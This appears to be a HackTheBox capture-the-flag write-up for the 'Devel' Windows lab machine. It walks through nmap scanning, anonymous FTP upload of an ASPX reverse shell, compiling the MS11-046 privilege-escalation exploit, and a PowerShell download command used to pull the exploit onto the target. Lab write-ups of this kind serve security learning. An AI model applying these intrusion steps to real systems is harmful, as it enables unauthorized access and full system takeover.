
HackTheBox - Devel Writeup

Box author | ch4pch4p


  • scan top 1000 ports
nmap -sC -sV -oN nmap/initial
  • the result

nmap initial scan

  • all ports scan
nmap -sC -sV -p- -oN nmap/all_ports
  • the result

nmap allports scan

Open Ports

  • We all know both Nmap scan shows us, just 2 open ports
  • 21/FTP = Microsoft ftpd
  • 80/HTTP = Microsoft IIS httpd 7.5


  • File Transfer Protocol [FTP] on this machine is open and allowed login as anonymous
  • Let’s connect to it

ftp anonymous

  • Well, I can’t find anything on it
  • So, I’m thinking this FTP might have been connected to the other port [port 80].


  • As we saw the image above. It has a welcome.png image.
  • Let’s put that on the URL

default IIS webpage

  • COOL!

Foothold/Gaining Access

ASPX Reverse Shell

  • Let’s try to get the reverse shell
  • So, this is Microsoft IIS
  • with light googling. I’ve found the aspx reverse shell
  • Source
  • I’m gonna put the reverse shell on the FTP server
  • Then, execute it with the curl command

shell as iis apppool\web

  • I’m in as iis apppool\web


  • Let’s enumerate this machine.
  • First, I’m gonna run the systeminfo command
  • the result


  • OK! WOW!
  • we’re on Microsoft Windows 7 and it’s a really old machine.
  • Again. I’m gonna google around.

Privilege Escalation


found an exploit

  • I’ve found this exploit
  • Let’s download it and compile the exploit
    -> don’t worry, they got the compiling instructions

Compiling Exploit

If you got this response after try to compiling command not found: i686-w64-mingw32-gcc
Just run this command to install it apt install mingw-w64
  • This is the command for compiling
i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32
  • After it is done, you got the binary in your directory called MS11-046.exe

Transfer the Exploit

  • Turns out, this machine has PowerShell
  • I’m gonna host my file with a python webserver
python3 -m http.server
powershell.exe -c "(New-Object System.Net.WebClient).DownloadFile('', 'c:\users\public\documents\lol.exe')"
  • Then, execute it.

become nt authority\system

  • YES! I’m become SYSTEM

User Flag

user flag

Administrator Flag

root flag


I’ve learned a lot today. If you using File Transfer Protocol [FTP] make sure to configure it properly and avoid using anonymous access. Lastly, just update the system or even better use the new and up-to-date version of windows.

I have a fun time doing this machine and I hope you guys do too. Bye ;)